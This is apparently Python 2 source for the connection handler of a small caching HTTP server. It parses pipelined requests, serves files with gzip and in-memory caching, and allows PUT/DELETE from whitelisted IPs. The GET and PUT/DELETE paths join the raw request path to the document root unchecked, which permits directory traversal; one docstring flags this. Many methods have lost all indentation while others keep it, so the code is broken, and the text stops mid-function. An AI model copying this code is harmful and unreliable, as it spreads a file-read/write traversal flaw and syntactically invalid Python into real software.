	#response status codes used by set_resp_code()
	#(FORBITDDEN is a historical typo kept for compatibility)
	HTTP_OK = 200
	HTTP_NOT_MODIFIED = 304
	HTTP_BAD_REQUEST = 400
	HTTP_FORBITDDEN = 403
	HTTP_NOT_FOUND = 404
	HTTP_SERVER_ERROR = 500
	HTTP_SERVER_RESET = 502
	HTTP_SERVER_BUSY = 503
	HTTP_SERVER_TIMEOUT = 504
	#x_parse() result codes
	PARSE_OK = 0
	PARSE_ERROR = -1
	PARSE_AGAIN = 1
	PARSE_MORE = 2
	PARSE_MORE2 = 3
	#header terminators ("\n\n" and "\n\r\n")
	EOL1 = b'\n\n'
	EOL2 = b'\n\r\n'
	#overall request handling result codes (self.xResult)
	xR_OK = 0
	xR_PARSE_AGAIN = 1
	xR_ERR_PARSE = -1
	xR_ERR_HANDLE = -2
	xR_ERR_403 = -3
	xR_ERR_404 = -4
	xR_ERR_5xx = -5
	xResult = 0
	#tables for RFC-1123 date formatting in date_time_string()
	weekdayname = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
	monthname = [None, 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
			'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
	#defaults overridable via 3xsd.conf
	index_files = ["index.html", "index.htm"]
	gzip_types = []
	gzip_types_default = ["html", "htm", "js", "css", "txt", "xml"]
	mimetype = {'html': 'text/html', 'htm': 'text/html', 'txt': 'text/plain',
			'css': 'text/css', 'xml': 'text/xml', 'js': 'application/x-javascript',
			'png': 'image/png', 'jpg': 'image/jpeg', 'gif': 'image/gif', 'bin': 'application/octet-stream'}
	#config parsing state
	web_config = None
	web_config_parsed = False
	_r = b'' #request headers
	#cache tuning knobs
	xcache_ttl = 5 #normally, 5-10 seconds internal cache time of items
	xcache_size = 1000000 #1 million items, about 1/3GB(333MB) mem used
	x_shelf_size = 1000000 #1 million items in disk, about 30GB disk size with average item size 30KB
	#gzip settings
	gzip_on = False
	gzip_size = 1000 #default >1KB file size can be gzipped
	gzip_max_size = 10000000 #default <=10MB file size can be gzipped
	#size suffix multipliers (k/m/g) for config values
	multip = {'k':1000, 'K':1000, 'm':1000000, 'M':1000000, 'g':1000000000, 'G':1000000000}
	#ip whitelist allowed to PUT/DELETE
	writers = []
	#time suffix multipliers (s/m/h/d/w/y) for expire_types config values
	multis = {'s':1, 'm':60, 'h':3600, 'd':86400, 'w':604800, 'y':31536000}
	expire_types = {}
	def __init__(self, conn, client_address, server, native_epoll=True,
			gevent_stream=False, recv_buf_size=16384, send_buf_size=65536, pipelining=False):
		"""Bind the handler to its server and, in gevent mode, serve at once.

		With native_epoll the instance is long-lived and driven via
		__call__; with gevent_stream it handles the whole connection right
		here in the constructor and then cleans up.
		"""
		self.server = server
		self._native_epoll = native_epoll
		self._gevent_stream = gevent_stream
		if native_epoll:
			#epoll mode: buffer sizes are global, taken from the server
			self.recv_buf_size = self.server.recv_buf_size
			self.send_buf_size = self.server.send_buf_size
		else:
			#gevent stream mode: per-handler buffer sizes
			self.recv_buf_size = recv_buf_size
			self.send_buf_size = send_buf_size
		self.server_version = ''.join([_Name, '/', __version__])
		self.server_pipelining = pipelining
		self.in_headers = {}
		self.out_headers = {}
		self.homedir = Homedir
		self.init_config()
		self.init_handler(conn, client_address)
		if self._gevent_stream:
			#under gevent, swap in the cooperative sendfile wrapper
			sendfile.sendfile = gevent_sendfile
			self.handle_request()
			self.clean()
def init_config(self):
if not self.web_config_parsed:
try:
self.web_config = ConfigParser.ConfigParser()
if not self.web_config.read('3xsd.conf'):
self.web_config.read('/etc/3xsd.conf')
for name, value in self.web_config.items('3wsd'):
if name == 'root':
if value:
self.homedir = value
elif name == 'index':
self.index_files = []
for item in value.split(','):
if item:
self.index_files.append(item)
if not self.index_files:
self.index_files = ["index.html", "index.htm"]
elif name == 'mime_types':
for item in value.split(','):
if item:
k, v = item.split(':', 1)
if k and v:
self.mimetype[k] = v
elif name == 'gzip':
if value.lower() == "on":
self.gzip_on = True
if not self.server.gzip_shelf:
self.server.gzip_shelf = shelve.open('shelf.gzip', writeback=True)
if not self.server.gzip_shelf_lock:
self.server.gzip_shelf_lock = multiprocessing.Lock()
elif name == 'gzip_size':
if value[-1] in ['k','m','g','K','M','G']:
_multip = self.multip[value[-1]]
self.gzip_size = int(value[:-1])*_multip
else:
self.gzip_size = int(value)
elif name == 'gzip_max_size':
if value[-1] in ['k','m','g','K','M','G']:
_multip = self.multip[value[-1]]
self.gzip_max_size = int(value[:-1])*_multip
else:
self.gzip_max_size = int(value)
elif name == 'gzip_types':
self.gzip_types = copy.copy(self.gzip_types_default)
for item in value.split(','):
if item:
if item not in self.gzip_types:
if item[0] == '-':
self.gzip_types.remove(item[1:])
else:
self.gzip_types.append(item)
elif name == 'writers':
self.writers = []
if value:
a = value.split(',')
for item in a:
if item.find('-') < 0:
self.writers.append(item)
else:
_ip = item.split('.')
_last = _ip[3].split('-')
for i in range(int(_last[0]), int(_last[1])+1):
ip = '.'.join([_ip[0], _ip[1], _ip[2], str(i)])
self.writers.append(ip)
elif name == 'xcache_ttl':
self.xcache_ttl = int(value)
elif name == 'server_pipelining':
if value.lower() == "on":
self.server_pipelining = True
elif name == 'expire_types':
self.expire_types = {}
for item in value.split(','):
if item:
k, v = item.split(':', 1)
if k and v:
if v[-1] in ['s','m','h','d','w','y']:
_multis = self.multis[v[-1]]
self.expire_types[k] = int(v[:-1])*_multis
else:
self.expire_types[k] = int(v)
except:
raise
web_config_parsed = True
def init_handler(self, conn, client_address, rw_mode=0):
self.addr = client_address
self.sock = conn
if self.sock:
self.sock_fileno = conn.fileno()
self.out_body_file = self.out_body_mmap = self._c = self.accept_encoding = None
self.out_body_size = self.out_body_file_lmt = self.cmd_get = self.cmd_head = self.cmd_put = self.cmd_delete = self.if_modified_since = self.keep_connection = self.xResult = 0
self.has_resp_body = self.xcache_hit = False
self.canbe_gzipped = self.gzip_transfer = self.gzip_chunked = False
self.gzip_finished = self.next_request = True
#self.vhost_mode = False
self.transfer_completed = 1
self.command = self.path = self.resp_line = self.resp_msg = self.out_head_s = self._r = self._rb = self.hostname = self.xcache_key = b''
self.c_http_ver = self.s_http_ver = self.r_http_ver = 1
self.resp_code = self.HTTP_OK
self.resume_transfer = rw_mode
	def __call__(self, fds):
		#should be called by native epoll server, can handle multi requests at one handler call, like: do 10 read events at a time with 10 connections
		"""Process a batch of (fd, rw_mode) work items from the epoll loop.

		rw_mode 0 = readable (parse + serve a request, possibly pipelined),
		rw_mode 1 = writable (resume a large transfer or drive pipelining).
		"""
		for f, rw_mode in fds: #ccc
			if rw_mode == 0:
				self.init_handler(self.server.conns[f], self.server.addrs[f], rw_mode)
				parse_stat = self.x_parse()
				if parse_stat == self.PARSE_OK or parse_stat == self.PARSE_MORE2:
					#a complete request is in: dispatch by method
					if self.cmd_get == 1 or self.cmd_head == 1:
						self.x_GET()
						self.x_response()
					elif self.cmd_put == 1 or self.cmd_delete == 1:
						self.x_PUT()
						self.x_response()
					else:
						self.xResult = self.xR_ERR_HANDLE
				elif self.server_pipelining and parse_stat == self.PARSE_MORE:
					#first of several pipelined requests: serve it and ask
					#for write events to keep the pipeline moving
					if self.cmd_get == 1 or self.cmd_head == 1:
						self.x_GET()
						self.x_response()
					elif self.cmd_put == 1 or self.cmd_delete == 1:
						self.x_PUT()
						self.x_response()
					else:
						self.xResult = self.xR_ERR_HANDLE
					self.server.epoll.modify(f, select.EPOLLIN|select.EPOLLOUT)
				elif parse_stat == self.PARSE_AGAIN:
					#incomplete request, wait for more data
					self.xResult = self.xR_PARSE_AGAIN
					continue
				else:
					self.xResult = self.xR_ERR_PARSE
			elif rw_mode == 1:
				#continue sending a large file or pipeling
				if f in self.server.resume:
					#large file transfering
					self.init_handler(self.server.conns[f], self.server.addrs[f], rw_mode)
					self.x_response()
				elif self.server_pipelining and f in self.server.x_reqs:
					if self.server.x_reqs[f][1] == 1:
						#add pipelining request
						fds.append((f, 0))
					else:
						#maybe large PUT request recving
						try:
							self.server.epoll.modify(f, select.EPOLLIN)
						except:
							pass
						self.keep_connection = 1
				elif self.server_pipelining and f not in self.server.x_reqs:
					self.transfer_completed = 0 #not do clean()
					try:
						self.server.epoll.modify(f, select.EPOLLIN)
					except:
						pass
				else:
					self.xResult = self.xR_ERR_PARSE
			else:
				self.xResult = self.xR_ERR_PARSE
		self.clean()
def check_connection(self, c_http_ver, check_ims=True, gen_xcache_key=True):
if c_http_ver == "HTTP/1.1":
self.c_http_ver = 1
if self.s_http_ver == self.HTTP11:
self.r_http_ver = 1
else:
self.r_http_ver = 0
else:
self.c_http_ver = 0
self.r_http_ver = 0
if self.in_headers.get("Connection", "null").lower() == "keep-alive":
self.keep_connection = 1
#self.r_http_ver = 1
else:
self.keep_connection = 0
if self.server.zlb_mode:
if gen_xcache_key:
self.hostname = self.in_headers.get("Host", "127.0.0.1").split(':',1)[0]
self.xcache_key = ''.join([self.hostname, self.path])
else:
self.xcache_key = self.path
if check_ims:
if self.in_headers.get("If-Modified-Since"):
self.if_modified_since = 1
else:
self.if_modified_since = 0
def date_time_string(self, ts=None):
if ts is None: ts = time.time()
year, month, day, hh, mm, ss, wd, y, z = time.gmtime(ts)
s = "%s, %02d %3s %4d %02d:%02d:%02d GMT" % (
self.weekdayname[wd],
day, self.monthname[month], year,
hh, mm, ss)
return s
def set_out_header(self, key, value):
self.out_headers[key] = value
def set_resp_code(self, code):
if self.r_http_ver == self.HTTP11:
prefix = "HTTP/1.1"
else:
prefix = "HTTP/1.0"
self.has_resp_body = False
self.resp_code = code
if code == 200:
self.resp_msg = "OK"
self.has_resp_body = True
elif code == 201:
self.resp_msg = "Created"
elif code == 204:
self.resp_msg = "No Content"
elif code == 301:
self.resp_msg = "Move Permanent"
elif code == 302:
self.resp_msg = "Move Temporary"
elif code == 304:
self.resp_msg = "Not Modified"
elif code == 404:
self.resp_msg = "Not Found"
elif code == 403:
self.resp_msg = "Forbidden"
elif code == 500:
self.resp_msg = "Server Error"
elif code == 502:
self.resp_msg = "Server Reset"
elif code == 503:
self.resp_msg = "Service Unavailable"
elif code == 504:
self.resp_msg = "Server Timeout"
self.resp_line = ''.join([prefix, ' ', str(code), ' ', self.resp_msg])
def handle_request(self):
#called when running at gevent mode
while self.next_request:
if self.x_parse() == self.PARSE_OK:
if self.cmd_get == 1 or self.cmd_head == 1:
self.x_GET()
else:
return
self.x_response()
else:
self.xResult = self.xR_ERR_PARSE
self.next_request = False
if self.keep_connection == 0:
self.next_request = False
	def x_parse(self):
		#get the request headers, xxx
		"""Read and parse one HTTP request from the socket.

		Returns PARSE_OK when a complete request (including any PUT body)
		has arrived, PARSE_AGAIN when more data is needed, PARSE_MORE /
		PARSE_MORE2 while pipelined requests remain queued in
		server.x_reqs, and PARSE_ERROR on malformed input or a dead peer.
		Partial state between events lives in server.x_reqs[fd]:
		[buffer, 1] = pipelined data pending, [buffer, 0] = incomplete
		headers, [buffer, -content_length, eol_pos] = PUT body pending.
		"""
		_doing_pipelining = _last_pipelining = _header_parsed = False
		_eol_pos = -1
		_cl = 0
		_fn = self.sock_fileno
		if _fn not in self.server.x_reqs:
			#nothing buffered: a fresh request
			r = self._r
			_xreqs_empty = _first_pipelining = True
		else:
			#resume from previously buffered data
			r = self._r = self.server.x_reqs[_fn][0]
			_xreqs_empty = _first_pipelining = False
			if self.EOL2 in r or self.EOL1 in r:
				if self.server.x_reqs[_fn][1] < 0:
					#request body not finished recv, PUT method
					_header_parsed = True
					_first_pipelining = True
					_cl = 0 - self.server.x_reqs[_fn][1]
					_eol_pos = self.server.x_reqs[_fn][2]
				elif self.server.x_reqs[_fn][1] == 0:
					#not pipelining requests, must done before
					self.server.x_reqs.pop(_fn)
					r = self._r = b''
				else:
					#self.server.x_reqs[_fn][1] == 1
					_doing_pipelining = True
		while 1:
			try:
				if not _doing_pipelining:
					b = self.sock.recv(self.recv_buf_size)
					if b:
						r = self._r = ''.join([r, b])
					else:
						#peer closed connection?
						return self.PARSE_ERROR
				if not _header_parsed:
					_eol_pos = r.find(self.EOL2)
				if _eol_pos > -1 and not _header_parsed:
					#headers mostly end with EOL2 "\n\r\n"
					if not self.server_pipelining:
						if not _xreqs_empty:
							#a big-headers request is all recieved
							self.server.x_reqs.pop(_fn, None)
					else:
						#for http pipelining
						if r.count(self.EOL2) > 1 or _eol_pos < len(r) - len(self.EOL2):
							#more data follows this request: queue the rest
							c = r.split(self.EOL2, 1)
							r = c[0]
							self.server.x_reqs[_fn] = [c[1], 1]
							_doing_pipelining = True
						else:
							if not _xreqs_empty:
								#doing the last pipelining, clear x_reqs
								self.server.x_reqs.pop(_fn, None)
								_last_pipelining = True
					break
				elif _eol_pos > -1 and _header_parsed:
					#recving request body
					self._rb = r[_eol_pos+len(self.EOL2):]
					if _cl > len(self._rb):
						#not finished recv request body
						self.server.x_reqs[_fn] = [r, 0 - _cl, _eol_pos]
						return self.PARSE_AGAIN
					elif _cl < len(self._rb):
						#full request body recv, there are other data, maybe pipelining requests
						self.server.x_reqs[_fn] = [self._rb[_cl:], 1]
						_doing_pipelining = True
						break
					else:
						#whole body recv done
						self.server.x_reqs.pop(_fn , None)
						#vars should been re-setup, though header parsed before
						break
				else:
					#not finished all headers, save recv data
					self.server.x_reqs[_fn] = [r, 0]
					return self.PARSE_AGAIN
				#self.sock.setblocking(0)
			except socket.error as e:
				if e.errno == errno.EAGAIN:
					#no more request data, see if the whole request headers should be recieved
					if self.EOL2 in r or self.EOL1 in r:
						break
					else:
						#keeping connection, no request has been sent..
						#self.sock.setblocking(1)
						return self.PARSE_AGAIN
				else:
					#peer closed connection?
					return self.PARSE_ERROR
		#a = r.split("\r\n", 1)
		a = r[:_eol_pos].splitlines()
		#if not a[0]:
		if len(a) < 2:
			#illeagal request headers
			return self.PARSE_ERROR
		try:
			#"GET / HTTP/1.1"
			self.command, self.path, _c_http_ver = a[0].split()
		except:
			#illeagal command/path line
			return self.PARSE_ERROR
		if self.command == 'GET':
			self.cmd_get = 1
		elif self.command == 'HEAD':
			self.cmd_head = 1
		elif self.command == 'PUT':
			self.cmd_put = 1
		elif self.command == 'DELETE':
			self.cmd_delete = 1
		else:
			return self.PARSE_ERROR
		"""
		#all headers go to dict
		if self.cmd_put == 0:
			self.in_headers = dict((k, v) for k, v in (item.split(": ") for item in a[1].strip().split("\r\n")))
		else:
			self.in_headers = dict((k, v) for k, v in (item.split(": ") for item in a[1].split(self.EOL2, 1)[0].split("\r\n")))
		"""
		#header lines become in_headers entries, split on the first ": "
		for _line in a[1:]:
			_pos = _line.find(": ")
			if _pos > 0:
				self.in_headers[_line[:_pos]] = _line[_pos+2:]
		self.check_connection(_c_http_ver)
		if self.cmd_put == 1 and not _header_parsed:
			#first sight of a PUT: split off whatever body bytes arrived
			if _eol_pos < len(r) - len(self.EOL2):
				self._rb = r[_eol_pos+len(self.EOL2):] #request body
			else:
				self._rb = b''
			_cl = int(self.in_headers.get("Content-Length", "0"))
			if _cl == 0:
				return self.PARSE_ERROR
			elif _cl > len(self._rb):
				#not finished recv request body
				self.server.x_reqs[_fn] = [r, 0 - _cl, _eol_pos]
				return self.PARSE_AGAIN
			elif _cl < len(self._rb):
				#full request body recv, there are other data, maybe pipelining requests
				self.server.x_reqs[_fn] = [self._rb[_cl:], 1]
				_doing_pipelining = True
			else:
				#full request body recv
				self.server.x_reqs.pop(_fn, None)
		if _fn not in self.server.x_reqs:
			#no more requests to process, last pipelining or non-pipelining
			return self.PARSE_OK
		else:
			if self.server.x_reqs[_fn][1] == 1:
				#doing pipelining, not last
				if _first_pipelining:
					#first piplining
					return self.PARSE_MORE
				else:
					#not first piplining
					return self.PARSE_MORE2
	def x_GET(self):
		"""Serve a GET/HEAD request from cache or the filesystem.

		Checks the in-memory xcache first (including the gzip shelf for a
		compressed variant), falling back to opening the file, stat'ing it
		for If-Modified-Since handling and Content-Length, and choosing a
		Content-Type by file extension.

		NOTE(security): self.path comes straight from the request and is
		joined to homedir without normalization; a path containing ".."
		could presumably escape the document root - verify upstream
		filtering or add a normpath/prefix check.
		"""
		if self.if_modified_since == 0 and self.xcache_key in self.server.xcache:
			self._c = self.server.xcache.get(self.xcache_key)
			ttl = self._c[0]
			if ttl >= time.time():
				#cache hit
				self.out_head_s, self.out_body_file, self.out_body_size, self.out_body_file_lmt, self.out_body_mmap, self.canbe_gzipped = self._c[1:]
				self.has_resp_body = True
				if self.r_http_ver == self.HTTP11:
					self.resp_line = 'HTTP/1.1 200 OK'
				else:
					self.resp_line = 'HTTP/1.0 200 OK'
				if self.canbe_gzipped and self.c_http_ver == self.HTTP11 and self.r_http_ver == self.HTTP11:
					#client may accept gzip: look for a compressed variant
					for x in self.in_headers.get("Accept-Encoding", "null").replace(' ','').split(','):
						if x == "gzip":
							self.gzip_transfer = True
							break
					if self.gzip_transfer:
						if self.xcache_key in self.server.gzip_shelf:
							#shelf entry is only valid if its mtime matches
							if self.server.gzip_shelf[self.xcache_key][4]==self.out_body_file_lmt:
								self.out_head_s=self.server.gzip_shelf[self.xcache_key][1]
								self.out_body_file=self.server.gzip_shelf[self.xcache_key][2]
								self.out_body_size=self.server.gzip_shelf[self.xcache_key][3]
								self.gzip_chunked=self.server.gzip_shelf[self.xcache_key][7]
								self.xcache_hit = True
								return
							else:
								self.xcache_hit = False
						else:
							self.xcache_hit = False
					else:
						self.xcache_hit = True
						return
				else:
					self.xcache_hit = True
					return
			else:
				#cache item expired
				#note: `file` is the py2 builtin type of objects returned by open()
				if isinstance(self._c[2], file) and not self._c[2].closed: #close the file opened, if not closed
					self._c[2].close()
				if self._c[5]: #close the mmap maped, if exists
					self._c[5].close()
				self._c = None
				self.server.xcache.pop(self.xcache_key)
				self.xcache_hit = False
		#cache miss or if_modified_since request
		"""
		if self.vhost_mode:
			path = ''.join([self.homedir, '/', self.hostname, self.path])
		else:
			path = ''.join([self.homedir, self.path])
		"""
		path = ''.join([self.homedir, self.path])
		if os.path.isdir(path):
			if not path.endswith('/'):
				#redirect directory requests missing the trailing slash
				self.set_resp_code(301)
				self.set_out_header("Location", ''.join([path, "/"]))
				return
			for index in self.index_files:
				index = os.path.join(path, index)
				if os.path.exists(index):
					path = index
					break
		try:
			f = open(path, 'rb')
			self.out_body_file = f
		except IOError as e:
			if e.errno == errno.EISDIR:
				self.set_resp_code(403)
			else:
				self.set_resp_code(404)
			return
		try:
			fs = os.fstat(f.fileno())
			#Last Modified time
			self.out_body_file_lmt = fs.st_mtime
			lmt = self.date_time_string(fs.st_mtime)
			lms = self.in_headers.get("If-Modified-Since")
			if lmt == lms:
				self.set_resp_code(304)
				return
			else:
				self.set_out_header("Last-Modified", lmt)
			self.out_body_size = fs[6]
			self.set_out_header("Content-Length", str(fs[6]))
		except:
			self.set_resp_code(404)
			f.close()
			return
		try:
			#NOTE(review): rsplit('.') without a maxsplit splits on every
			#dot, so a[1] is not the extension for names like "a.b.c";
			#confirm whether multi-dot names are expected here
			a = path.rsplit('.')
			content_type = self.mimetype.get(a[1])
			if content_type:
				self.set_out_header("Content-Type", content_type)
				#small-enough text-ish files are flagged for gzip caching
				if self.gzip_on and a[1] in self.gzip_types and self.out_body_size > self.gzip_size and self.out_body_size <= self.gzip_max_size:
					self.canbe_gzipped = True
			else:
				self.set_out_header("Content-Type", "application/octet-stream")
			if a[1] in self.expire_types:
				self.set_out_header("Cache-Control", ''.join(["max-age=", str(self.expire_types[a[1]])]))
				self.set_out_header("Expires", self.date_time_string(time.time() + self.expire_types[a[1]]))
		except:
			self.set_out_header("Content-Type", "application/octet-stream")
		self.set_resp_code(200)
def x_PUT(self):
try:
_peer_ip, _port = self.sock.getpeername()
except:
_peer_ip = b''
if _peer_ip not in self.writers:
self.xResult = self.xR_ERR_HANDLE
return
path = ''.join([self.homedir, self.path])
if not os.path.isdir(path):
if self.cmd_delete == 1:
if os.path.exists(path):
try:
os.unlink(path)
self.set_resp_code(204)
except:
self.set_resp_code(403)
else:
self.set_resp_code(204)
elif self.cmd_put == 1:
try:
_dir = path.rsplit('/', 1)[0]
if not os.path.exists(_dir):
os.makedirs(_dir, 0755)
f = open(path, 'wb')
f.write(self._rb)
f.close()
self.set_resp_code(201)
except IOError as e:
self.set_resp_code(403)
else:
if self.cmd_delete == 1:
try:
os.rmdir(path)
self.set_resp_code(204)
except:
self.set_resp_code(403)
else:
self.set_resp_code(403)
def send_out_all_headers(self, extra=''):
#if self.keep_connection == 1 and self.r_http_ver == self.HTTP11:
if self.keep_connection == 1:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: keep-alive\n\n", extra]))
#writev(self.sock_fileno, [self.resp_line, "\n", self.out_head_s, "Connection: keep-alive\n\n", extra])
else:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: close\n\n", extra]))
#writev(self.sock_fileno, [self.resp_line, "\n", self.out_head_s, "Connection: close\n\n", extra])
def send_out_all_headers2(self, extra=None):
if extra:
#if self.keep_connection == 1 and self.r_http_ver == self.HTTP11:
if self.keep_connection == 1:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: keep-alive\n\n", extra]))
else:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: close\n\n", extra]))
else:
#if self.keep_connection == 1 and self.r_http_ver == self.HTTP11:
if self.keep_connection == 1:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: keep-alive\n\n"]))
else:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: close\n\n"]))
def x_response(self):
if self.resume_transfer == 0:
sent = _sent = 0
elif self.resume_transfer == 1:
self.xcache_hit = self.has_resp_body = True
self.command = 'GET'
self.cmd_get = 1
_sent = 0
self.transfer_completed = 0
_rs = self.server.resume.get(self.sock_fileno)
if _rs:
self.out_body_file, self.out_body_size, sent, self.keep_connection, self.gzip_transfer, self.xcache_key = _rs
if self.gzip_transfer:
_org_file = self.server.xcache[self.xcache_key][2]
_org_size = self.server.xcache[self.xcache_key][3]
self.out_head_s = self.server.gzip_shelf[self.xcache_key][1]
self.out_body_file = self.server.gzip_shelf[self.xcache_key][2]
self.out_body_size = self.server.gzip_shelf[self.xcache_key][3]
_file_lmt = self.server.gzip_shelf[self.xcache_key][4]
_gzip_pos = self.server.gzip_shelf[self.xcache_key][5]
self.gzip_finished = self.server.gzip_shelf[self.xcache_key][6]
self.gzip_chunked = self.server.gzip_shelf[self.xcache_key][7]
else:
#no such resume, must be first trans
self.server.epoll.modify(self.sock_fileno, select.EPOLLIN)
self.resume_transfer = sent = 0
self.out_head_s = self.server.xcache[self.xcache_key][1]
self.out_body_file = self.server.xcache[self.xcache_key][2]
self.out_body_size = self.server.xcache[self.xcache_key][3]
#At this point, begin transfer response, first to roll out headers
if not self.xcache_hit:
_t = time.time()
if len(self.out_headers) > 0:
self.out_head_s = ''.join(["Server: ", self.server_version, "\nDate: ", self.date_time_string(_t), '\n', '\n'.join(['%s: %s' % (k, v) for k, v in self.out_headers.items()]), '\n'])
else:
self.out_head_s = ''.join(["Server: ", self.server_version, "\nDate: ", self.date_time_string(_t), '\n'])
if self.resp_code == self.HTTP_OK and self.out_body_size > 0:
#Only 200 and body_size > 0 response will be cached, [ttl, out_head_s, f, fsize, f_lmt, mmap], and file smaller than 1KB will be mmaped
if self.out_body_size < 1000 and not self.canbe_gzipped:
self.out_body_mmap = mmap.mmap(self.out_body_file.fileno(), 0, prot=mmap.PROT_READ)
else:
if self.canbe_gzipped and self.c_http_ver == self.HTTP11 and self.r_http_ver == self.HTTP11:
for x in self.in_headers.get("Accept-Encoding", "null").replace(' ','').split(','):
if x == "gzip":
self.gzip_transfer = True
break
if self.gzip_transfer:
#generate gzip cache item
try:
#gzip it
_gzf = zlib.compressobj(6,
zlib.DEFLATED,
zlib.MAX_WBITS | 16,
zlib.DEF_MEM_LEVEL,
0)
self.out_body_file.seek(0)
if self.out_body_size > self.send_buf_size/2:
self.gzip_chunked = True
_ss = _gzf.compress(self.out_body_file.read(self.send_buf_size/2))
_ss = ''.join([_ss, _gzf.flush(zlib.Z_SYNC_FLUSH)])
else:
_ss = _gzf.compress(self.out_body_file.read(self.out_body_size))
_ss = ''.join([_ss, _gzf.flush(zlib.Z_FINISH)])
_out_headers = copy.copy(self.out_headers)
_out_headers["Content-Encoding"] = "gzip"
if self.gzip_chunked:
_out_headers["Transfer-Encoding"] = "chunked"
try:
del _out_headers["Content-Length"]
except:
pass
else:
_out_headers["Content-Length"] = len(_ss)
_out_head_s = ''.join([self.resp_line, "\nServer: ", self.server_version, "\nDate: ", self.date_time_string(_t), '\n', '\n'.join(['%s: %s' % (k, v) for k, v in _out_headers.items()]), '\n'])
#moved to self.server.check_3ws()
#keep the mem cache of gzip_shelf limitted
#while len(self.server.gzip_shelf.cache) > 1000:
# self.server.gzip_shelf.cache.popitem()
#keep the disk cache of gzip_shelf limitted
if len(self.server.gzip_shelf) > self.x_shelf_size:
with self.server.gzip_shelf_lock:
self.server.gzip_shelf.popitem()
if self.gzip_chunked:
#[file size original, headers, content, body_size, file modified time, current gzip position, finished, chunked]
_sss = ''.join([hex(len(_ss))[2:], '\r\n', _ss, '\r\n'])
with self.server.gzip_shelf_lock:
self.server.gzip_shelf[self.xcache_key] = [self.out_body_size, _out_head_s, _sss, len(_sss), self.out_body_file_lmt, self.send_buf_size/2, False, self.gzip_chunked]
self.server._gzs[self.xcache_key] = _gzf
else:
with self.server.gzip_shelf_lock:
self.server.gzip_shelf[self.xcache_key] = [self.out_body_size, _out_head_s, _ss, len(_ss), self.out_body_file_lmt, self.out_body_size, True, self.gzip_chunked]
#moved to self.server.check_3ws()
#if hasattr(self.server.gzip_shelf.dict, 'sync'):
# with self.server.gzip_shelf_lock:
# self.server.gzip_shelf.dict.sync()
except:
pass #zzz
if len(self.server.xcache) > self.xcache_size:
self.server.xcache.popitem()
#put xcache item, every item take about 8+300+8+8+8+8+1=340 bytes
#3 items per 1KB mem, 3k items per 1MB mem, 3M items per 1GB mem
self.server.xcache[self.xcache_key] = [self.xcache_ttl + _t, self.out_head_s, self.out_body_file, self.out_body_size, self.out_body_file_lmt, self.out_body_mmap, self.canbe_gzipped]
if self.gzip_transfer:
_org_file = self.server.xcache[self.xcache_key][2]
_org_size = self.server.xcache[self.xcache_key][3]
self.out_head_s = self.server.gzip_shelf[self.xcache_key][1]
self.out_body_file = self.server.gzip_shelf[self.xcache_key][2]
self.out_body_size = self.server.gzip_shelf[self.xcache_key][3]
_file_lmt = self.server.gzip_shelf[self.xcache_key][4]
_gzip_pos = self.server.gzip_shelf[self.xcache_key][5]
self.gzip_finished = self.server.gzip_shelf[self.xcache_key][6]
self.gzip_chunked = self.server.gzip_shelf[self.xcache_key][7]
elif self.resp_code >= self.HTTP_BAD_REQUEST:
self.out_head_s = ''.join([self.out_head_s, "Content-Length: ", str(len(self.resp_msg) + 4), '\n'])
#send headers & body
if self.has_resp_body and self.out_body_file and self.cmd_get == 1:
if self.out_body_mmap:
if self.server_pipelining:
if self.sock_fileno in self.server.x_reqs:
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, 1)
self.send_out_all_headers(extra=self.out_body_mmap[:])
if self.sock_fileno not in self.server.x_reqs:
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, 0)
else:
self.send_out_all_headers(extra=self.out_body_mmap[:])
elif isinstance(self.out_body_file, str) and self.out_body_size < 1000 and self.gzip_finished:
self.send_out_all_headers(extra=self.out_body_file)
else:
#Try send as much as data once in a TCP packet
#Because 2(1 header + 1 body) packets turn down performance up to 50% than 1(header + body) packet
if self.resume_transfer == 0:
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, 1)
self.send_out_all_headers()
if self.out_body_size - sent >= self.send_buf_size:
if self._native_epoll:
_send_buf = self.send_buf_size
else:
_send_buf = self.out_body_size
else:
_send_buf = self.out_body_size - sent
try:
if isinstance(self.out_body_file, str):
_sent = self.sock.send(self.out_body_file[sent:_send_buf+sent])
else:
_sent = sendfile.sendfile(self.sock_fileno, self.out_body_file.fileno(),
sent, _send_buf)
sent += _sent
if self.resume_transfer == 0:
#after transfer snd_buf data, requeue event, let other event to be handled
if sent < self.out_body_size or not self.gzip_finished:
self.server.resume[self.sock_fileno] = [self.out_body_file,
self.out_body_size, sent, self.keep_connection,
self.gzip_transfer, self.xcache_key]
self.server.epoll.modify(self.sock_fileno, select.EPOLLOUT)
self.transfer_completed = 0
else:
if self.out_body_size == sent and self.gzip_finished:
self.server.resume.pop(self.sock_fileno)
self.server.epoll.modify(self.sock_fileno, select.EPOLLIN)
self.transfer_completed = 1
else:
self.server.resume[self.sock_fileno] = [self.out_body_file,
self.out_body_size, sent, self.keep_connection,
self.gzip_transfer, self.xcache_key]
except OSError as e: #rrr
if e.errno == errno.EAGAIN:
#send buffer full?just wait to resume transfer
#and gevent mode can't reach here, beacause gevent_sendfile intercepted the exception
self.server.resume[self.sock_fileno] = [self.out_body_file,
self.out_body_size, sent, self.keep_connection,
self.gzip_transfer, self.xcache_key]
elif e.errno == errno.EPIPE:
#peer closed connection
self.transfer_completed = 1
self.server.resume.pop(self.sock_fileno)
self.server.cleanup(self.sock_fileno);
else:
raise
if not self.gzip_finished:
#continue gen gzip chunked encoding file data, zzz
_gzf = self.server._gzs.get(self.xcache_key)
if not _gzf:
#this wrong, may cause error, just in case
_gzf = zlib.compressobj(6,
zlib.DEFLATED,
zlib.MAX_WBITS | 16,
zlib.DEF_MEM_LEVEL,
0)
if _org_size > _gzip_pos + self.send_buf_size/2:
_z_buf_size = self.send_buf_size/2
_flush_mode = zlib.Z_SYNC_FLUSH
else:
